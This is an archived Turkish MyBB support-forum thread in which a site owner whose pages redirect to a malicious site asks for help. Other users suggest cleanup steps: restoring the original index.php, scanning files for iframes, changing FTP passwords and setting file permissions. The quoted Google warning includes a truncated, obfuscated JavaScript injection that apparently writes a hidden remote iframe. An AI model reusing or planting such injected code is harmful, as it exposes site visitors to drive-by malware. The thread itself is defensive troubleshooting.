MyBB Destek Forumu

Orjinalini görmek için tıklayınız: siteme virus bulaştı
Şu anda (Arşiv) modunu görüntülemektesiniz. Orjinal Sürümü Görüntüle internal link
Sayfalar: 1 2
sanırım bilgisayarımdaki virüs siteme bulaştı. sitemden google a girince adnow diye bi siteye bağlanıyor.googleda aradım trojenmiş. 2 gündür sitemin hiti inanılmaz düştü. google paneline girdim. alttaki gibi bi uyarı ile karşılaştım. ne yapabilirim acaba

Google, sitenizde zararlı bir kod tespit etti ve kullanıcılar bu sitedeki sayfaları ziyaret etmeye çalıştıklarında kendilerine bununla ilgili bir uyarı gösterecektir.

Tüm zararlı kodları sitenizden kaldırdıktan ve sitenin zararlı yazılımdan etkilenmesine neden olan açıkları kapattıktan sonra sitenizin yeniden incelenmesini isteyebilirsiniz.
İnceleme talebinde bulunun


Kötü amaçlı yazılım bulaşan sayfalardan bazıları aşağıda listelenmiştir, ancak bu sayfaları kaldırmanız sitenizdeki sorunu düzeltmek için yeterli olmaz. Bu sorunun altında yatan güvenlik açıklarını da belirleyip gidermeniz gerekir. Sitenizi nasıl temizlersiniz?

Yerleştirilen şüpheli kod Örnekler
Kod:
<script>c=2;i=c-2;if(window.document)try{new c.prototype}cat
ch(hgberger){f=['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n
8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n6
3n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76
n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n
-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22
n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n64n63
n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n-6n
81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n
1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66
n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70
n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n
9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64
n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29
n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n6
1n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n
1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61
n1n6

index.php adresinde gözüküyor diyor.
yeni bi paket indirip içine index.php'yi atıp denermisin bir daha.
Edit Yeni Bir Paket Değil Kullandığınız Paketin Orjinal İndex.php'sini.
Evet onu demek iştemiştim baştan yeniden atın diye Gülümseme Pardon..
yeni 0 paket içnideki index.php yi yükledim eskisi 15 kb idi yeni üklediğim 10 kb gözüküyor. düzelmişdir acaba şimdi nasıl test edicem kodların temizlenip temizlenmediğini
Buradan indirdiğin Paket ise sorun olmaz. Önceden, Nereden kontrol etmiştin. Hata geçtiyse de sorun kalmamıştır.
Öncelikle Sitenizin Ftp Adresine Sizin Bilgisayarınızdan Giren Varmı?

Varsa O Kişilerde Bu Söylediklerimi Uygulasınlar

İlk Önce Sitenizdeki Dosyalarınızı Bilgisayarına Kopyalayın Sonra
Kod:
http://www.abacre.com/afr.zip

Adresinden Verdiğim Programı İndir Ve Aşağıda Anlatılanları Uygula

Alıntı:79447447318640356673.jpgbrowse yazan yere ftp'den bilgisayarımıza aktardığımız dosyaların adresi find kısmına ise ' iframe ' yazın ve ' execute ' butonuna tıklayın.

4-)bu esnada program iframe içeren dosyaları bulup en altta bu dosyaları gösterir. bundan sonrası temizleme aşaması, temizlemiş olduğunuz dosyaları ftp'ye gönderin. (temizlemeden önce muhakkak yedek alın)

daha sonra ftp şifrelerinizi değiştirip virüsün girmiş olduğu ve gireceği dosyaların izinlerini 444 yapın. son olarak güncel bir trojen-virüs programı yükleyin.

(23.03.2012, Saat: 19:17)Zeet Adlı Kullanıcıdan Alıntı: [ -> ]yeni 0 paket içnideki index.php yi yükledim eskisi 15 kb idi yeni üklediğim 10 kb gözüküyor. düzelmişdir acaba şimdi nasıl test edicem kodların temizlenip temizlenmediğini

Düzelmez Çünkü Virüs Kendini Birçok Yere Kopyalamıştır Anlattığımı Uygulayınız

Sayfalar: 1 2